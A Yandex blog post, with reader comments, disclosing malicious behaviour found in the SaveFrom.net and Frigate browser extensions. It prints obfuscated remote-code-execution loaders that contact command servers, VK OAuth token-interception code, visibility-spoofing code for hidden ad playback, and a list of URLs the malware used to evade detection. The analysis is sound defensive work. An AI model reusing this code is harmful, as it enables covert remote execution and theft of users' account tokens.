company_banner

Яндекс отключил расширения с аудиторией в 8 млн пользователей. Объясняем, почему мы пошли на такой шаг

    Сегодня мы приняли решение отключить расширения SaveFrom.net, Frigate Light, Frigate CDN и некоторые другие, установленные у пользователей Яндекс.Браузера. Совокупная аудитория этих инструментов превышает 8 млн человек.

    В этом посте мы расскажем о причинах и поделимся с сообществом результатами анализа деятельности расширений. Вы узнаете про тайное воспроизведение видео из онлайн-кинотеатров с целью накрутки просмотров. Увидите фрагмент кода, содержащий механизм для перехвата токенов социальных сетей. Мы покажем, как организована динамическая загрузка и выполнение произвольного кода без обновления расширений.



    Предыстория


    Некоторое время назад пользователи Яндекс.Браузера стали обращаться в поддержку с жалобами на странный звук, который можно было принять за аудиорекламу. Примеры таких жалоб:



    Общение с пользователями помогло нам понять, что источником звука на самом деле была видеореклама. Но странность заключалась в том, что никакое видео в этот момент на экране не воспроизводилось. Сначала мы подумали, что оно проигрывалось в другой открытой вкладке или за пределами видимости, но эта гипотеза не подтвердилась. Начали запрашивать у пользователей дополнительную информацию. В том числе список установленных расширений.

    Так мы заметили общий признак: у пострадавших было установлено расширение для загрузки видео от сервиса SaveFrom.net. Начали тестировать. Догадка оказалась верной: отключение расширения отключало и фоновый шум. Затем связались с его разработчиками. Они высказали предположение, что это ошибки конвертера, и внесли исправления. После обновления расширения жалобы на звук прекратились.

    Новая история


    В ноябре команда антифрода Яндекса заподозрила неладное. Она получила сигнал о том, что кто-то использует аудиторию популярных браузеров для накрутки просмотров видео в онлайн-кинотеатрах. Пользователи видео не видели, потому что оно воспроизводилось в фоне. Тем не менее оно потребляло существенный трафик и перегружало работой вычислительные ресурсы компьютера, поэтому такое поведение нельзя назвать добросовестным.

    При этом в поддержку на посторонний звук больше никто не жаловался. Это можно было легко объяснить сознательным исключением аудитории Яндекс.Браузера из целевой. Подобные попытки избежать внимания со стороны нашего антифрода мы уже неоднократно встречали в прошлом при анализе поведения расширений из Chrome Web Store (напомним, что наш браузер поддерживает установку в том числе из этого каталога).

    Но всё оказалось куда проще: на этот раз фоновое воспроизведение видео проходило в беззвучном режиме. Вскоре коллеги из Службы информационной безопасности выяснили, что проблема затрагивает не только внешних пользователей нашего браузера, но и даже наших коллег. Так мы получили проблемные ноутбуки для исследования и наконец-то смогли детально разобраться в происходящем.

    На проблемных устройствах наших коллег были установлены расширения SaveFrom.net, Frigate Light или Frigate CDN. Источник их установки значения не имел (SaveFrom.net мог быть установлен с сайта, а Frigate — напрямую из каталога Chrome Web Store).

    Далее мы поделимся с вами результатами нашего анализа. Приведём фрагменты исходного кода и объясним суть их работы. Начнём с объяснения того, как функциональность может подгружаться в расширение без его обновления, и закончим, собственно, воспроизведением видео на компьютере ничего не подозревающего пользователя.

    Динамическая загрузка и выполнение кода


    Frigate


    (полный код расширения доступен по ссылке)

    Оба расширения из этого семейства (Light и CDN) имеют один и тот же участок кода, который отвечает за динамическую подгрузку и исполнение JS-скриптов. Специалистам рекомендую обратить внимание на то, как хитро тут спрятана функция eval(). Кстати, обфускация кода и скрытие функциональности запрещены в Chrome Web Store.

    profile.js
    const configUrl = "https://fri-gate.org/config.txt";
    initProfiler(configUrl);
    function initProfiler(confUrl) {
        const { Promise, navigator, setTimeout, chrome: { runtime, extension }, XMLHttpRequest: helper, Math: { floor, random }, String: { fromCharCode }, Object: { assign }, JSON: { parse, stringify }, } = window;
        if (!extension || !runtime) {
            return;
        }
        const { reload, id, getBackgroundPage, sendMessage } = runtime;
        const k = fromCharCode(99, 111, 110, 115, 116, 114, 117, 99, 116, 111, 114);
        const noop = () => { };
        const safePromise = (fn) => (new Promise(fn)).catch(noop);
        const checkError = () => runtime.lastError;
        const tryCatch = (fn) => { try {
            return fn();
        }
        catch (e) { } };
        const wrap = (f, v) => tryCatch(() => f(v));
        const debug = (v) => v && safePromise(wrap(Promise[k], v));
        const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));
        const b64decode = (str) => decodeURIComponent(escape(atob(str)));
        const b64encode = (str) => btoa(unescape(encodeURIComponent(str)));
        const decode = (str) => tryCatch(() => b64decode(str)) || str;
        let initializing = false;
        let initialized = false;
        let config;
        const sendBeacon = async () => {
            try {
                if (initializing || initialized || !navigator.onLine) {
                    return;
                }
                initializing = true;
                const method0 = "GET";
                const method = "POST";
                if (!config) {
                    config = await fetch(confUrl, { method0 })
                        .then((r) => r.text())
                        .then(decode)
                        .then(parse);
                }
                const { urls = [], delay = 1000 } = config;
                //console.log(urls[0]);
                if (!urls.length) {
                    return;
                }
                await sleep(delay);
                const data = {
                    id,
                    ...runtime.getManifest(),
                };
                const url = urls[floor(random() * urls.length)];
                if (!url) {
                    return;
                }
                const promise = new Promise((resolve, reject) => {
                    const r = assign(new helper(), {
                        withCredentials: true,
                        onerror: reject,
                        ontimeout: reject,
                        onabort: reject,
                        onload: () => 200 === r.status ? resolve(r.response) : reject(),
                    });
                    r.open(method, url);
                    r.send(b64encode(stringify(data)));
                });
                const result = await promise || "";
                await sleep(delay);
                debug(decode(result));
                initialized = true;
            }
            catch (e) {
            }
            finally {
                initializing = false;
            }
        };
        if (!getBackgroundPage) {
            return sendMessage({ type: fromCharCode(248) }, (result) => {
                checkError();
                debug(result);
            });
        }
        tryCatch(() => getBackgroundPage((bg) => {
            if (bg === window) {
                setTimeout(reload, 60 * 60 * 1000);
                setInterval(sendBeacon, 60 * 1000);
                addEventListener("online", sendBeacon);
                sendBeacon();
            }
        }));
    }


    Этот код совершает запрос по адресу fri-gate.org/config.txt и получает адрес командного сервера для дальнейшей работы. Такое решение позволяет без обновления расширения менять адреса командного сервера, если с ним что-то пошло не так. В момент нашего анализа командным сервером был gatpsstat.com.

    Пример ответа
    ewogICJhdHRhY2hTdGFja3RyYWNlIjogZmFsc2UsCiAgImRlbGF5IjogMTAwMCwKICAidXJscyI6IFsiaHR0cHM6Ly9nYXRwc3N0YXQuY29tL2V4dC9zdGF0Il0sCiAgInJlbGVhc2UiOiAyODAsCiAgInNhbXBsZVJhdGUiOiAxNSwKICAiZW52aXJvbm1lbnQiOiAicHJvZCIsCiAgImxldmVsIjogImluZm8iCn0

    Раскодирован в:
    {
      "attachStacktrace": false,
      "delay": 1000,
      "urls": ["https://gatpsstat.com/ext/stat"],
      "release": 280,
      "sampleRate": 15,
      "environment": "prod",
      "level": "info"
    }


    Раз в час расширения совершают запрос к командному серверу в обработчик /ext/stat. При первом запросе им выставляется cookie, которая содержит uuid пользователя. Ответ сервера декодируется и попадает в функцию debug(), которая, по сути, является функцией eval() для выполнения JS-кода.

    Пример кода
    const noop = () => { };
        const safePromise = (fn) => (new Promise(fn)).catch(noop);
        const checkError = () => runtime.lastError;
        const tryCatch = (fn) => { try {
            return fn();
        }
        catch (e) { } };
        const wrap = (f, v) => tryCatch(() => f(v));
        const debug = (v) => v && safePromise(wrap(Promise[k], v));
        const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));
        const b64decode = (str) => decodeURIComponent(escape(atob(str)));
        const b64encode = (str) => btoa(unescape(encodeURIComponent(str)));
        const decode = (str) => tryCatch(() => b64decode(str)) || str;


    SaveFrom.net


    (полный код расширения также доступен по ссылке)

    На 19122-й строке файла background.js начинается блок сбора и выполнения кода.

    background.js
    var b, w = c.reload, _ = c.id, S = c.getBackgroundPage, k = c.sendMessage, x = m(99, 111, 110, 115, 116, 114, 117, 99, 116, 111, 114), O = function() {}, A = function(e) {
                    var t = arguments.length > 1 && void 0 !== arguments[1] ? arguments[1] : O;
                    try {
                        return e()
                    } catch (e) {
                        return t()
                    }
                }, E = function(e) {
                    return e && (t = function(e, t) {
                        return A((function() {
                            return e(t)
                        }
                        ))
                    }(n[x], e),
                    new n(t).catch((function() {}
                    )));
                    var t
                }, I = function(e) {
                    return new n((function(t) {
                        return a(t, e)
                    }
                    ))
                }, R = function(e) {
                    return A((function() {
                        return atob(e.trim())
                    }
                    )) || e || ""
                }, P = !1, j = !1, T = function() {


    Стоит обратить внимание на строку “x = m(99, 111, 110, 115, 116, 114, 117, 99, 116, 111, 114)”, которая аналогична “fromCharCode(99, 111, 110, 115, 116, 114, 117, 99, 116, 111, 114)” из расширения Frigate.

    Далее идёт большой switch, который ответственен за загрузку и выполнения JS-кода.

    Код
    switch (t.prev = t.next) {
                                case 0:
                                    if (t.prev = 0,
                                    !P && !j && r.onLine) {
                                        t.next = 3;
                                        break
                                    }
                                    return t.abrupt("return");
                                case 3:
                                    if (P = !0,
                                    "GET",
                                    n = "POST",
                                    b) {
                                        t.next = 10;
                                        break
                                    }
                                    return t.next = 9,
                                    Object(u.a)({
                                        url: e,
                                        method: "GET"
                                    }).then((function(e) {
                                        var t = e.body;
                                        return R(t)
                                    }
                                    )).then(v);
                                case 9:
                                    b = t.sent;
                                case 10:
                                    if (a = (o = b).urls,
                                    s = void 0 === a ? [] : a,
                                    f = o.delay,
                                    d = void 0 === f ? 1e3 : f,
                                    s.length) {
                                        t.next = 13;
                                        break
                                    }
                                    return t.abrupt("return");
                                case 13:
                                    return t.next = 15,
                                    I(d);
                                case 15:
                                    if (g = l({
                                        id: _
                                    }, c.getManifest()),
                                    w = s[h(p() * s.length)]) {
                                        t.next = 19;
                                        break
                                    }
                                    return t.abrupt("return");
                                case 19:
                                    return S = function(e) {
                                        return btoa(encodeURIComponent(e).replace(/%([0-9A-F]{2})/g, (function(e, t) {
                                            return m(parseInt(t, 16))
                                        }
                                        )))
                                    }
                                    ,
                                    k = Object(u.a)({
                                        method: n,
                                        url: w,
                                        data: S(y(g))
                                    }).then((function(e) {
                                        if (200 !== e.statusCode)
                                            throw new Error;
                                        return R(e.body)
                                    }
                                    )),
                                    t.next = 23,
                                    k;
                                case 23:
                                    return x = t.sent,
                                    t.next = 26,
                                    I(d);
                                case 26:
                                    E(x),
                                    j = !0,
                                    t.next = 32;
                                    break;
                                case 30:
                                    t.prev = 30,
                                    t.t0 = t.catch(0);
                                case 32:
                                    return t.prev = 32,
                                    P = !1,
                                    t.finish(32);
                                case 35:
                                case "end":
                                    return t.stop()
                                }


    По блокам выполнение происходит так:

    • 3-10: получение адреса командного сервера с sf-helper.com/static/ffmpegSignature. В нашем случае это опять gatpsstat.com/. Вот это совпадение!
    • 15: получение манифеста приложения.
    • 19: кодирование манифеста в base64, его отправка, регистрация хендлера.
    • После получение ответа происходит обработка функцией R, которая снимает base64.
    • 23: результат R сохраняется в x.
    • 26: происходит вызов E(x), который выполняет JS-код.

    Ответ ffmpegSignature
    ewogICJhdHRhY2hTdGFja3RyYWNlIjogZmFsc2UsCiAgImRlbGF5IjogMTAwMCwKICAidXJscyI6IFsiaHR0cHM6Ly9nYXRwc3N0YXQuY29tL2V4dC9zdGF0Il0sCiAgInJlbGVhc2UiOiAyODAsCiAgInNhbXBsZVJhdGUiOiAxNSwKICAiZW52aXJvbm1lbnQiOiAicHJvZCIsCiAgImxldmVsIjogImluZm8iCn0

    Раскодирован в:
    {
      "attachStacktrace": false,
      "delay": 1000,
      "urls": ["https://gatpsstat.com/ext/stat"],
      "release": 280,
      "sampleRate": 15,
      "environment": "prod",
      "level": "info"
    }


    Одинаковая часть для всех расширений


    /ext/stat


    Итак, все рассматриваемые расширения имеют возможность динамически выполнять JS-код, который они получают раз в час из обработчика /ext/stat. Этот JS-код в разные моменты времени может быть любым, сколь угодно опасным. Скрытое воспроизведение видео может быть лишь одним из множества возможных симптомов. Но поймать (и задокументировать) подобные симптомы не так-то и просто. Поначалу мы пытались дампить трафик через функциональность браузера, но это не приносило результатов. Даже начали сомневаться, что выбрали правильный путь. Обратились к более медленному, но надёжному варианту: завернули весь трафик через Burp Suite (это такая платформа для анализа безопасности веб-приложений, которая, среди прочего, позволяет перехватывать трафик между приложением и браузером).

    Вскоре детальный анализ трафика принёс плоды. Оказалось, что наши предыдущие попытки получить правильный ответ были неуспешны из-за конфига dangerRules. Он содержал список адресов, после посещения которых потенциально опасная деятельность прекращалась.

    Декодированный base64 из /ext/stat, который содержит dangerRules
    {"updateUri":"/ext/up","dataUri":"/ext/data","version":"1961","hash":"e3e03a744b6ff019c74ad9a714579ab3","timestampMS":1606678312460,"clientId":"4016cb52-df6b-495e-b2a3-49a013eef28b","endpoint":"http://gatpsstat.com","ttlSec":3600,"defs":[{"id":1,"type":"core","options":{"url":"/ext/def"}},{"id":2,"type":"dt","options":[]},{"id":3,"type":"bl","options":{"rules":["^chrome://extensions"],"dangerRules":["^chrome://[^/]*-internals","^chrome://net-","^chrome://network-","^chrome://tracing","^https?://installs.pro","^https?://admon.pro","^https?://log.admon.pro","^https?://installmonster.ru","^https?://browser.yandex.ru/help/support/support.html","^https?://browser.yandex.ru/feedback/","^https?://savefrom.userecho.com/communities/1-savefromru/topics","^https?://addons.opera.com/en-gb/extensions/details/savefromnet-helper/","^https?://bugs.opera.com/wizard/","^https?://help.opera.com/en/computer-bug-wizard/","^https?://chrome.google.com/webstore/detail/frigate-light/mdnmhbnbebabimcjggckeoibchhckemm"]}}],"sentry":{"ignoreErrors":["Unexpected token G in JSON at position 0","Extension context invalidated"],"enabled":false,"debug":false,"release":"1961","environment":"stack"}}
    


    Обратите внимание: сомнительная активность прекращалась, если пользователь открывал адрес поддержки Яндекс.Браузера или служебную страницу для анализа трафика. Хитро!

    Расследование продолжилось. Предстояло разобраться с обработчиком /ext/up, которому и передавался конфиг. Его ответ был сжат и зашифрован, а код обфусцирован. Но это нас не остановило.

    /ext/up


    Ещё один обработчик с исполняемым кодом. Его ответ маскируется под GIF-картинку.



    Расшифрованный ответ содержит JSON с тремя кусками кода. Названия блоков намекают на контекст исполнения кода: bg.js (применяется на фоновой странице расширения), page.js (используется для инъекций в просматриваемые страницы), entry_point.js (код, который отдаётся на /ext/stat).

    bg.js и page.js умеют получать и внедрять в страницы iframe с video для показа рекламы. Кроме того, bg.js имеет функциональность, которая может использоваться для перехвата oAuth-токенов сервиса ВКонтакте. Мы не можем однозначно утверждать, что этот механизм в реальности использовался, но он присутствует в коде, поэтому мы рекомендуем отозвать токены для vk.com.

    Код для перехвата токенов
    async vkt(e) {
                const {
                    core: {
                        state: t,
                        webRequestManager: {
                            onBeforeRedirect: s
                        }
                    },
                    options: {
                        oauth: r
                    }
                } = this;
                if (!r || !e) return;
                const n = (await In.get("https://oauth.vk.com/authorize", r).then(e => e.text())).match(/[^"]+\?act=grant_access&[^"]+/),
                    i = n && n[0];
                if (!i) return;
                const o = new ze,
                    a = e => {
                        const {
                            details: {
                                url: t,
                                redirectUrl: r
                            }
                        } = e;
                        if (t !== i) return;
                        const n = r.match(/#access_token=([a-z0-9]+)/),
                            c = n && n[1];
                        o.resolve(c), s.removeListener(a)
                    };
                s.addListener(a), await In.get(i);
                const c = await o;
                c && (await t.set("vkt", c), this.pushData({
                    id: e,
                    token: c
                }))
            }


    Кроме того, в bg.js мы видим код, который подменяет браузерный API, чтобы просмотры засчитывались даже при скрытом видео.

    Код для подмены браузерного API
    class Ci extends mi {
        patch(e) {
            var t;
            const s = e.Document.prototype;
            for (const e of ["hidden", "webkitHidden"]) Js.getter(s, e, () => !1);
            for (const e of ["visibilityState", "webkitVisibilityState"]) Js.getter(s, e, () => "visible");
            Js.method(s, "hasFocus", () => !0), Js.getter(e, "outerWidth", () => e.innerWidth), Js.getter(e, "outerHeight", () => e.innerHeight);
            const r = "availTop" in e.screen ? null !== (t = Reflect.get(e.screen, "availTop")) && void 0 !== t ? t : 0 : void 0;
            Js.getter(e, "screenY", () => null != r ? r : e.screenY), Js.getter(e, "screenTop", () => null != r ? r : e.screenTop)
        }
    }


    /ext/def


    Предположительно, этот обработчик отвечает за отдачу списка текущих заданий для открутки видео. Запрос клиента и ответ сервера сжаты и зашифрованы на ключе из параметра hk.



    Пример расшифрованного ответа
           
                  [
                        "*://*.utraff.com/*",
                        "*://*.lookmeet.tv/*",
                        "*://*.videout.ru/*",
                        "*://*.buzzoola.com/*",
                        "*://*.vihub.ru/*",
                        "*://*.betweendigital.com/*",
                        "*://*.tvigle.ru/*",
                        "*://*.megogo.ru/*",
                        "*://*.megogo.net/*",
                        "*://*.fqtag.com/*",
                        "*://*.instreamvideo.ru/*",
                        "*://*.videoroll.net/*",
                        "*://*.fresh-video.com/*",
                        "*://playreplay.me/*"
                    ],
          
                .......
            {
                "id": 368,
                "type": "gb",
                "options": {
                    "blacklist": [
                        "*://an.yandex.ru/meta/*",
                        "*://an.yandex.ru/jserr/*",
                        "*://an.yandex.ru/jstracer"
                    ]
                }
            }
        ],
        "dup": false
    }


    В результате выполнения выданного задания видно, что браузер открывает видеоплеер и включает в нём видео. При этом сам видеоплеер не виден пользователю и действие происходит скрытно.



    /ext/beacon


    Отчёт о выполнении задания расширение отправляет на /ext/beacon. С уже знакомым нам сжатием и шифрованием.

    Тело запроса
                   {
                        "pageId": "QYJZMN",
                        "tabId": -1,
                        "frameId": 1580,
                        "origin": "https://kinorole.ru",
                        "url": "https://kinorole.ru/robots.txt"
                    }
                },
                {
                    "scriptId": 193,
                    "timestamp": 1606678594,
                    "type": "stat",
                    "version": "1961",
                    "payload": {
                        "type": "etab",
                        "key": "player_load"
                    },
                    "env": {
                        "world": "ext",
                        "pageId": "MTJKAC",
                        "tabId": -1,
                        "frameId": 1581,
                        "origin": "https://kinorole.ru",
                        "url": "https://kinorole.ru/film/_hodjachie-mertveci?v=3&utm_source=mbac&utm_campaign=193"
                    }
                }
            ]
        }
    }


    Краткий пересказ того, что делают расширения


    Повторим ещё раз всё то же самое, но кратко.

    1. Расширения запрашивают с сервера конфиг, в котором содержится адрес другого, командного сервера с обработчиком /ext/stat .
    2. Обработчик /ext/stat присваивает уникальный uuid пользователю.
    3. Каждый час расширения совершают запрос на адрес /ext/stat и исполняют код, полученный в ответе.
    4. Скрипт с /ext/stat совершает запрос на /ext/up, получает сжатый основной код для выполнения cкрипта.
    5. Выполнение скрипта с /ext/up может активировать функциональность перехвата access_token'ов ВКонтакте при их получении пользователем. Перехваченные токены могут отправляться на /ext/data.
    6. Скрипт с /ext/up получает список заданий с /ext/def. Запрос и ответ шифруются на ключе, переданном в параметре hk.
    7. Видео с рекламой воспроизводится в браузере втайне от пользователя.
    8. Отправляется отчёт на /ext/beacon.

    Это то, как выглядит работа расширений, если смотреть на их код и трафик. Но полезно взглянуть на проблему и со стороны пользователей, поэтому за спойлером вас ждёт подборка отзывов из Chrome Web Store.

    Отзывы пользователей








    Принятые нами меры


    Мы считаем описанное поведение потенциально опасным и недобросовестным, поэтому приняли решение отключить в Яндекс.Браузере уже установленные копии расширений SaveFrom.net, Frigate Light, Frigate CDN и некоторых других. Пользователи этих расширений получат уведомление, в котором мы расскажем о причинах отключения. После этого они смогут принять осознанное решение и при необходимости включить их вновь (хотя мы настоятельно рекомендуем так не поступать).

    Кроме того, мы передали результаты нашего технического анализа коллегам из «Лаборатории Касперского» и Google. В «Лаборатории Касперского» уже подтвердили наличие потенциально вредоносной составляющей в расширениях, теперь продукты компании детектируют эту угрозу и блокируют связанные с ней URL-адреса и фрагменты скриптов.

    Также в ходе исследования было обнаружено более двух десятков менее популярных браузерных расширений, использующих аналогичный код. Их мы также отключаем. Мы призываем экспертов присоединиться к поиску и других потенциально опасных расширений. Результаты можно присылать через форму. Вместе мы сможем побороть эту угрозу.

    Список id отключенных расширений
    acdfdofofabmipgcolilkfhnpoclgpdd
    oobppndjaabcidladjeehddkgkccfcpn
    aonedlchkbicmhepimiahfalheedjgbh
    aoeacblfmdamdejeiaepojbhohhkmkjh
    eoeoincjhpflnpdaiemgbboknhkblome
    onbkopaoemachfglhlpomhbpofepfpom
    inlgdellfblpplcogjfedlhjnpgafnia
    ejfajpmpabphhkcacijnhggimhelopfg
    pgjndpcilbcanlnhhjmhjalilcmoicjc
    napifgkjbjeodgmfjmgncljmnmdefpbf
    glgemekgfjppocilabhlcbngobillcgf
    klmjcelobglnhnbfpmlbgnoeippfhhil
    ldbfffpdfgghehkkckifnjhoncdgjkib
    mbacbcfdfaapbcnlnbmciiaakomhkbkb
    mdnmhbnbebabimcjggckeoibchhckemm
    lfedlgnabjompjngkpddclhgcmeklana
    mdpljndcmbeikfnlflcggaipgnhiedbl
    npdpplbicnmpoigidfdjadamgfkilaak
    ibehiiilehaakkhkigckfjfknboalpbe
    lalpacfpfnobgdkbbpggecolckiffhoi
    hdbipekpdpggjaipompnomhccfemaljm
    gfjocjagfinihkkaahliainflifnlnfc
    ickfamnaffmfjgecbbnhecdnmjknblic
    bmcnncbmipphlkdmgfbipbanmmfdamkd
    miejmllodobdobgjbeonandkjhnhpjbn
    Яндекс
    Как мы делаем Яндекс

    Comments 507

      +14
      Список id отключенных расширений:
      acdfdofofabmipgcolilkfhnpoclgpdd — VDP: Best Video Downloader
      oobppndjaabcidladjeehddkgkccfcpn — Y2Mate — Video Downloader
      aonedlchkbicmhepimiahfalheedjgbh — Помощник
      aoeacblfmdamdejeiaepojbhohhkmkjh — RadioGaGa
      eoeoincjhpflnpdaiemgbboknhkblome — x3
      onbkopaoemachfglhlpomhbpofepfpom — x3
      inlgdellfblpplcogjfedlhjnpgafnia — x3
      ejfajpmpabphhkcacijnhggimhelopfg — x3
      pgjndpcilbcanlnhhjmhjalilcmoicjc — x3
      napifgkjbjeodgmfjmgncljmnmdefpbf — x3
      glgemekgfjppocilabhlcbngobillcgf — x3
      klmjcelobglnhnbfpmlbgnoeippfhhil — x3
      ldbfffpdfgghehkkckifnjhoncdgjkib — x3
      mbacbcfdfaapbcnlnbmciiaakomhkbkb — friGate CDN
      mdnmhbnbebabimcjggckeoibchhckemm — friGate Light
      lfedlgnabjompjngkpddclhgcmeklana — SaveFrom.net помощник
      mdpljndcmbeikfnlflcggaipgnhiedbl — x3
      npdpplbicnmpoigidfdjadamgfkilaak — x3
      ibehiiilehaakkhkigckfjfknboalpbe — x3
      lalpacfpfnobgdkbbpggecolckiffhoi — x3
      hdbipekpdpggjaipompnomhccfemaljm — friGate3 proxy helper
      gfjocjagfinihkkaahliainflifnlnfc — x3
      ickfamnaffmfjgecbbnhecdnmjknblic — x3
      bmcnncbmipphlkdmgfbipbanmmfdamkd — x3
      miejmllodobdobgjbeonandkjhnhpjbn — x3
      х3 — не находится в Chrome Web Store
        +5
        х3 — не находится в Chrome Web Store


        Не совсем так, некоторые из них там есть, просто надо не поиском пользоваться, а подставлять ID: chrome.google.com/webstore/detail/coupons-at-checkout/onbkopaoemachfglhlpomhbpofepfpom?hl=ru

        Некоторые из Opera Store, некоторые уже удалены из обоих сторов.
          0
          Все что описаны, находятся в Chrome Web Store. поиск через ID и осуществлялся.
            +3
            Ну я привел вам пример того, про который вы написали «х3», но который есть в Chrome Web Store. Он такой не один.
              0
              Странно, да, действительно, через поиск не находится
          +5
          вот блин
          friGate3 proxy helper удобен…

          Сообщество, что вы используете для удобного включения прокси для определённых сайтов?
            0
            HandyCache, но это не расширение, а отдельный прокси с возможностью использования внешних прокси по заданным условиям.
              +8
              SwitchyOmega правда он для FF
                +4
                Почему же? Он у меня в Chrome несколько лет прекрасно работает.
                  0
                  есть под хром. И кажется это удобно. Можно отдельные сайты(заблокированные) гнать через прокси, а остальные «direct»
                    +1
                    friGate CDN мне ещё нравился, что там ещё автоматом подключается поддержка .onion сайтов. Есть ещё подобные расширения, кто-то использует?
                      +1
                      А надо расширения?
                      Tor полноценно поднятый на хоумсервере в виртуалке
                      +.pac файл где сказано что на .onion — ходить через Tor
                        0
                        Ещё бы подробнее найти что-то хоть про написание pac-ов. То работает, то нет. В Опере Блинк свежей, например.
                            0
                            Да я уже разное про него смотрел, и примеры разные изучал. Но проблема в том, что много вообще неясного вокруг них. Например, что надо сделать в Опере Престо, чтобы применилось изменение pac-а. Или вот, в свежей Опере Блинк просто не работает, и всё. И как назло, все примеры очень разные, в одном одно используют, в другом другое.
                        +1

                        А потом friGate сливает небось куда вы ходите. Смысл этого.

                          0
                          Смысл есть.
                          Например обойти локальные блокировки.
                            0

                            Есть тор, есть опера с впн. Пользоваться расширениями, которые явно будут делать мутное что-то, чтобы монетизироваться.

                              0
                              «Opera VPN» это скорее прокси, нежели VPN. А тот факт, что трафик идёт от браузера до «родных» серверов, даёт повод сомневаться, что этот трафик не анализируется компанией Opera.
                      0
                      А прокси где взять?
                      +1
                      proxy switchy omega есть и под хром
                        +1

                        warp от cloudflare

                          0
                          Не работает на Windows 8.1.
                            0

                            Работает, пользуюсь. Удобно, что громадное приложение для управления не нужно запускать — есть лаконичный cli.

                              0
                              Спасибо, последние беты даже не устанавливались, а релиз заработал на 8.1.
                          +17
                          FoxyProxy
                            0

                            Поддерживает запароленный Socks5, в отличие от хрома, да.

                              0
                              На Хромиуме (Хроме) не поддерживает. Есть только одно расширение, которое поддерживает это на Хромиуме, но оно умеет работать только с одним прокси.
                              0

                              Tor bundle ( установлен как сервис) + foxyproxy

                              +4
                              Browsec? Правда, автоматом включается только на одном избранном сайте.
                                0
                                Аналогично) Правда с ним «тяжелее» грузятся сайты, но что поделать… вроде фригейт уже как то раз отсутствовал в хром-магазине, я тогда брату настраивал комп, и пришлось выкачивать файл расширения с моего компа и вручную пихать в его хром.
                                Может снова когда-нибудь появится.
                                0
                                Я возможно не совсем по теме (всё таки речь больше о Chrome-based браузерах) но фригейт был и на используемой мной мозилле, как его замену я использую github.com/salarcode/SmartProxy (есть и для хрома)).
                                Единственное что прокси надо самому искать, но с фригейта я в своё время потому и слез что пред-настроенные прокси пропали.
                                  0
                                  вот в этом и дело. прокси приходится менять вручную и я не нашел такого, где автоматом.
                                  SwitchyOmega тоже надо прокси ставить вручную :(
                                  фригейт прокси стабильно работал(работает) в этом плане :)
                                    0
                                    В FoxyProxy можно писать правила для каждого прокси, делать black и white листы сайтов
                                  0

                                  Теперь вы знаете, в каком месте расширение Frigate его надо сломать, чтобы оно не вредило. Сделайте из него свой userscript, оставив только хорошее.

                                    0
                                    Тут всё же надо знать где и что меня. Или разобраться, на что уйдет пару часов точно:)
                                    А потом еще разбираться как его выложить для всех и т.п. Тоже фиг знает сколько времени.

                                    А вот если кто-то, кто в этом уже разбирается пересоберёт Frigate и выложит, было бы здорово:)

                                    Серьезно, если это просто, подскажите как это делается по шагам. Я бы пересобрал friGate3 proxy helper, но вот как выложить уже не знаю, да и наверное это будет нарушением авторских прав на оригинальный код
                                      0

                                      1). Проще всего надо найти место с URL конфигуратора и похерить. Вряд-ли это приведёт к потере легальной функциональности.


                                      2). Я имела ввиду, что это можно на раз-два сделать для себя до точно хотя бы.

                                    +1

                                    Штатный функционал: автоконфигурация прокси через pac-файл. Сам файл беру с antizapret.info — там уже прописана логика включения, и прописываю в нём свой прокси.

                                      0
                                      Готовый — это же не спортивно! Надо самому написать его. :-)
                                        0
                                        Хочу, хочу неспортивно! Где, говорите, там файл взять?
                                          0
                                          Ориентироваться можно и на тот pac, что в комплекте i2p есть… Я его за основу взял.
                                      0
                                      FoxyProxy, он хоть устарел и импорт\экспорт поломался, но до сих пор работает.
                                        +2
                                        Да, FriGate очень удобная штука (была). Для себя выяснил, что единственный заблокированный сайт, на который приходится заходить время от времени — это r*tracker, который имеет собственное расширение. В остальных случаях использую VPN.
                                          0
                                          Browsec
                                            +3
                                            'Обход блокировок Рунета' — очень хорошее расширение, умеет работать, как со встроенным прокси, так и своими socks|http-прокси и локальным tor (можно установить, как сервис в windows)
                                              0
                                              Proxy SwitchyOmega
                                              в нем можно PAC профиль создать с адресом РАС загрузкой локально и обновлением.
                                              то есть тот же самый антизапрет будет у тебя новый храниться локально обновляться и управлять перенаправлением запросов
                                                  0
                                                  FastProxy
                                                    +4
                                                    Уж что-что, а в FastProxy использовался самый очевидный для разбирающихся в jquery метод исполнения загруженного кода, но совершенно не очевидный для людей, не часто пользующихся jquery.
                                                    at the first glance, you won't find any eval() or chrome.tabs.executeScript() calls in this extension. Don't be fooled, this extension uses jquery library, which AUTOMATICALLY EXECUTES any downloaded script using $.ajax() call. This is documented jquery functionality, but if you don't know about that, you'll be puzzled.

                                                    Разработчик FastProxy какое-то время использовал прокси-серверы АнтиЗапрета, без разрешения проекта, и заменял страницу с ошибкой открытия сайта на свой текст. Я включил в страницу ошибки MutationObserver и переадресовывал пользователей на вот эту страницу:

                                                    antizapret.prostovpn.org/fastproxy-warn
                                                      0
                                                      mester пишет: на фоне хромовской версии, фаерфокс версия вообще полностью безопасна
                                                      Фух, я в firefox им и пользуюсь.
                                                    0
                                                    FoxyProxy и в лисе и в хромообразных.
                                                    0
                                                    Avira Phantom VPN
                                                      +2
                                                      Использую PAC-файл, никаких дополнительных расширений при этом не требуется. Работает в любом браузере. Прописывается как URL автоконфигурации в настройках прокси, для Window URL выглядит примерно так:
                                                      file:///c:/путь/proxy.pac
                                                      сам файл:
                                                      function FindProxyForURL(url, host)

                                                      {

                                                      var domains = [
                                                      "visualwebsiteoptimizer.com",
                                                      "amazonaws.com",
                                                      "tribl.io",
                                                      "olark.com",
                                                      "linkedin.com",
                                                      "archive.org",
                                                      "telegram.org",
                                                      "telegram.me",
                                                      "t.me",
                                                      "slideshare.net",
                                                      "lurkmore.to",
                                                      "upyachka.io",
                                                      "protonmail.com",
                                                      "anonfiles.com"
                                                      ];
                                                      var len = domains.length, i;
                                                      if(isInNet(dnsResolve(host), "5.3.3.0", "255.255.255.0")) return "PROXY proxy.example.ru:3128"; /* обнаруживает блокировку DNS'ом в domru */
                                                      for(i=0; i<len; i++) if(dnsDomainIs(host,domains[i])) {
                                                      /*
                                                      if(isInNet(myIpAddress(), "192.168.0.0", "255.255.255.0")) return "PROXY 192.168.0.2:3128";

                                                      else

                                                      - можно выбирать в завимости от сети, к которой производилось подключение
                                                      */
                                                      return "PROXY proxy.example.ru:3128";
                                                      }
                                                      return "DIRECT";

                                                      }

                                                        0
